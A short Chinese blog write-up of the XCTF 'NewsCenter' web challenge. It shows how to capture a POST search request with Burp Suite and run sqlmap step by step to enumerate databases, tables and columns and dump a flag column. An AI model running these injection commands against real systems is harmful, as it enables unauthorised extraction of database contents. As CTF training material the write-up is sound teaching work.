美文网首页CTF-Web安全
攻防世界-Web-NewsCenter

攻防世界-Web-NewsCenter

作者: 简言之_ | 来源:发表于2019-06-29 21:21 被阅读4次
题目信息:
image.png
工具:bp,SQLmap
知识点:sql注入之post注入

打开题目,有一处搜索框,搜索新闻。考虑SQL注入。


image.png 随便输入一个2,用bp抓包,发现是post方式,然后Copy to file,将报文保存为txt文件。 image.png
保存为123.txt image.png
然后用sqlmap一键注入(-r 表示从一个文件中载入HTTP请求,123.txt如果没有放到sqlmap目录就用绝对路径)

0x01:查找数据库
python sqlmap.py -r D:\SQLmap\123.txt --dbs

image.png

0x02:查找表
python sqlmap.py -r D:\SQLmap\123.txt --tables -D news

image.png

0x03:查找字段
python sqlmap.py -r D:\SQLmap\123.txt --column -D news -T secret_table

image.png

0x04:显示字段信息
python sqlmap.py -r D:\SQLmap\123.txt --dump -D news -T secret_table -C fl4g

image.png
参考:sqlmap用于sql注入语法

相关文章

  • 攻防世界-Web-NewsCenter

    题目信息: 打开题目,有一处搜索框,搜索新闻。考虑SQL注入。 0x01:查找数据库python sqlmap.p...

  • 攻防世界新手

    就按照题目的难易程度写 新手区没有涉及到栈的相关知识,几乎是栈漏洞 get_shell 第一个题目比较简单 ida...

  • 攻防世界 lottery

    .git源码泄露/题目也给了附件下载源码/访问robots.txt也能看到.git代码审计,审了好久都没找到漏洞点...

  • 2019-05-30 新手练习区完结

    至此攻防世界的pwn新手练习区完结了

  • 攻防世界 Re wp

    hello ctf sprintf():int sprintf( char *buffer, const char...

  • 攻防世界 Crypto wp

    easy rsa p和q为选取的两个大素数 e为随机选取的小于r =(p-1)(q-1)的数 d为e关于模r的模反...

  • 攻防世界 Pwn wp

    0x01get_shell 下载附件后直接丢IDA F5 0x02CGfsb 先用checksec查看开了哪些保护...

  • 攻防世界 string wp

    参考:CTF-wiki格式化字符串漏洞利用 0x01寻找漏洞 -checksec -在IDA中对文件进行分析。 查...

  • iOS安全攻防

    iOS安全攻防 iOS安全攻防

  • 攻防世界-Web_php_unserialize

    高手进阶区,Web_php_unserialize 题目来源:攻防世界[https://adworld.xctf....

网友评论

    本文标题:攻防世界-Web-NewsCenter

    本文链接:https://www.haomeiwen.com/subject/tkcmcctx.html